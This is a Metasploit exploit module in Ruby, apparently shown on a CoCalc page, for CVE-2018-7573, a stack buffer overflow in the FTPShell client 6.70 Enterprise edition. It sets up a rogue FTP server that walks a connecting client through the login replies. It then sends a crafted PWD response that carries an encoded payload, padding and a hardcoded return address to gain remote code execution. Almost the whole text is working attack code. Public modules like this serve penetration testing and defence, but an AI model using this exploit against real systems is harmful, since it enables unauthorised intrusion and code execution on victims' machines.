CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::TcpServer
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise
16
          edition) allowing remote code execution.
17
        },
18
      'Author'   =>
19
        [
20
          'r4wd3r',           # Original exploit author
21
          'Daniel Teixeira'   # MSF module author
22
        ],
23
      'License'        => MSF_LICENSE,
24
      'References'     =>
25
        [
26
          [ 'CVE', '2018-7573'],
27
          [ 'EDB', '44596' ]
28
        ],
29
      'Payload'        =>
30
        {
31
          'Space'    => 400,
32
          'BadChars' => "\x00\x22\x0d\x0a\x0b"
33
        },
34
      'Platform'       => 'win',
35
      'Targets'        =>
36
        [
37
          # CALL ESI in FTPShell.exe : 0x00452eed
38
          [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ]
39
        ],
40
      'Privileged'     => false,
41
      'DefaultOptions' =>
42
        {
43
          'SRVHOST' => '0.0.0.0',
44
          'EXITFUNC' => 'thread'
45
        },
46
      'DisclosureDate' => '2017-03-04',
47
      'DefaultTarget'  => 0))
48

49
    register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
50
  end
51

52
  def exploit
53
    srv_ip_for_client = datastore['SRVHOST']
54
    if srv_ip_for_client == '0.0.0.0'
55
      if datastore['LHOST']
56
        srv_ip_for_client = datastore['LHOST']
57
      else
58
        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
59
      end
60
    end
61

62
    srv_port = datastore['SRVPORT']
63

64
    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
65
    super
66
  end
67

68
  def on_client_connect(client)
69
    p = regenerate_payload(client)
70
    return if p.nil?
71
    print_status("#{client.peerhost} - connected.")
72

73
    res = client.get_once.to_s.strip
74
    print_status("#{client.peerhost} - Request: #{res}") unless res.empty?
75
    print_status("#{client.peerhost} - Response: Sending 220 Welcome")
76
    welcome = "220 Welcome.\r\n"
77
    client.put(welcome)
78

79
    res = client.get_once.to_s.strip
80
    print_status("#{client.peerhost} - Request: #{res}")
81
    print_status("#{client.peerhost} - Response: sending 331 OK")
82
    user = "331 OK.\r\n"
83
    client.put(user)
84

85
    res = client.get_once.to_s.strip
86
    print_status("#{client.peerhost} - Request: #{res}")
87
    print_status("#{client.peerhost} - Response: Sending 230 OK")
88
    pass = "230 OK.\r\n"
89
    client.put(pass)
90
    res = client.get_once.to_s.strip
91
    print_status("#{client.peerhost} - Request: #{res}")
92

93
    sploit = '220 "'
94
    sploit << payload.encoded
95
    sploit << "\x20" * (payload_space - payload.encoded.length)
96
    sploit << target.ret
97
    sploit << "\" is current directory\r\n"
98

99
    print_status("#{client.peerhost} - Request: Sending the malicious response")
100
    client.put(sploit)
101

102
  end
103
end
104

105